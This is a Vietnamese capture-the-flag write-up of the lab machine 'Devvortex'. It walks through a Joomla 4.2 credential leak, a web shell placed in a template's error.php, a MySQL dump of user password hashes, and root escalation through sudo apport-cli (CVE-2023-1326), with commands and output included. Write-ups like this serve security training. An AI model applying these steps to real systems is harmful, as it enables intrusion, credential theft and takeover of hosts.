Devvortex

Contents

1. Enumeration
   1. Zenmap:
   2. Website
   3. Fuff
   4. Website dev
2. Gaining access www-data
3. Gaining access logan
4. Privilege escalation

Enumeration

Zenmap:

Website

Không có gì để khai thác từ website trên.

Fuff

Tôi tìm thấy sub-domain dev.

Website dev

Kiểm tra file robots.txt:

Đây là một website joomla. Kiểm tra nó với Joomla

Gaining access www-data

Tôi biết rằng version joomla là 4.2. Tìm kiếm các khai thác cho joomla 4.2 tôi có: exploit-db

Khi đó tôi có khai thác như sau:

Truy cập page administrator và login với user và password mà tôi tìm thấy:

Ngay bây giờ tôi đã có quyền truy cập vào page administrator:

Tiếp tục khai thác giống trong hacktricks để lấy RCE. Tôi click System > any Templates > choose site:

Khi đó tôi edit error.php file. Thêm một đoạn mã shell vào trong file này và tôi có thể có được một website shell như sau:

Kết nối reverse shell:

Gaining access logan

Tôi biết rằng có tồn tại user logan trong hệ thống. Trước đó khi khai thác joomla tôi thấy có tồn tại user logan. kết nối mysql với user và password mà tôi đã có:

www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ mysql -h localhost -u lewis -p
<emplates/cassiopeia$ mysql -h localhost -u lewis -p
Enter password: 

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)

mysql> use joomla;
use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
| .................             |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
| sd4fg_webauthn_credentials    |
| sd4fg_workflow_associations   |
| sd4fg_workflow_stages         |
| sd4fg_workflow_transitions    |
| sd4fg_workflows               |
+-------------------------------+
71 rows in set (0.00 sec)

mysql> select * from sd4fg_users;
select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id  | name       | username | email               | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                                                                                  | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |     0 |         1 | 2023-09-25 16:44:24 | 2023-11-26 03:47:58 | 0          |                                                                                                                                                         | NULL          |          0 |        |      |            0 |              |
| 650 | logan paul | logan    | logan@devvortex.htb | $2y$10$**************************************************j12 |     0 |         0 | 2023-09-26 19:15:42 | NULL                |            | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL          |          0 |        |      |            0 |
   |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)

mysql>

Tôi có hash password của logan. Crack nó và login:

Privilege escalation

Tìm kiếm các khai thác cho apport-cli version 2.20.11 thấy thấy tồn tại CVE-2023-1326 với poc: Do not run sensible-pager as root if using sudo/pkexec

Tạo một file crash bất kỳ:

Khi đó tôi có thể có quyền root như sau:

logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (30.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes
....................................................................
!id
uid=0(root) gid=0(root) groups=0(root)
!done  (press RETURN)

Sử dụng một reverse shell bất kỳ và tôi có được shell: